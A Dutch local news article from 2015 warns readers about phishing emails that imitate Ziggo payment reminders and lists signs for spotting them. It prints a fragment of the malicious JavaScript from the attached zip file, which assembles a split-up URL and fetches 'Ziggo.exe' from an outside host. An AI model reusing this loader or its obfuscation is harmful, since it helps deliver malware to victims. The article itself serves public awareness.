Pas op voor phishing mails van Ziggo
Geplaatst: zondag 7 juni 2015 om 23:05 | Views: 12762
PEKELA - Internetcriminelen worden steeds creatiever in het vissen naar persoonlijke gegevens zoals wachtwoorden, bankrekeningnummers, pincodes, enzovoorts. Ziggo vindt het daarom belangrijk dat een ieder phishing kan herkennen.Op de website laat Ziggo voorbeelden zien van phishingmails die in omloop zijn geweest alsof de afzender het kabelbedrijf zelf was. Ook geeft Ziggo uitleg hoe deze e-mails en berichten als phishing herkend kunnen worden.
We hebben het zelf ook aan den lijve ondervonden. Via de e-mail wordt een betalingsherinnering gestuurd. Het incasseren van het openstaande bedrag zou ondanks verschillende herinneringen niet voldaan zijn. Het verraderlijke van deze e-mail is dat wel het bankrekeningnummer van Ziggo genoemd wordt. Ook door de schrijfstijl wordt sterk de indruk gewekt dat dit gewoon een mail is die van Ziggo komt. Niets is echter minder waar.
De link met de openstaande factuur verwijst naar een zipfile waarin een Java script opgeborgen is. Wat er precies gebeurt op het moment dat het Java script geopend wordt:
var bar = "bellesqa."
var zer = "n"
var fad = "l"
var ced = "/Ziggo"
var dar = ".ex"
var efe = "e"
ze.open("GET", "http://" + bar + "" + zer + "" + fad + "" + ced + "" + dar + "" + efe + "", false);
Oftewel, via de URL bellasqa.nl wordt het bestand Ziggo.exe opgehaald. Menig computer gebruiker weet dat dit alleen voor Windows PC's dreigend is. Wat er precies gebeurt op het moment dat dit uitvoerbestand gestart wordt, hebben we aan ons voorbij laten gaan. Wees gewaarschuwd!
Hoe zie je dat dit phishing is?
Je wordt aangesproken als ‘geachte heer/mevrouw’ in plaats van met je eigen naam.
Een betalingsherinnering zal Ziggo altijd per brief sturen
Een specificatie van een vordering zal nooit als bijlage worden verstuurd
De toon van de e-mail is dreigend
Zie ook de pagina van Ziggo hoe phishingmails herkend kunnen worden.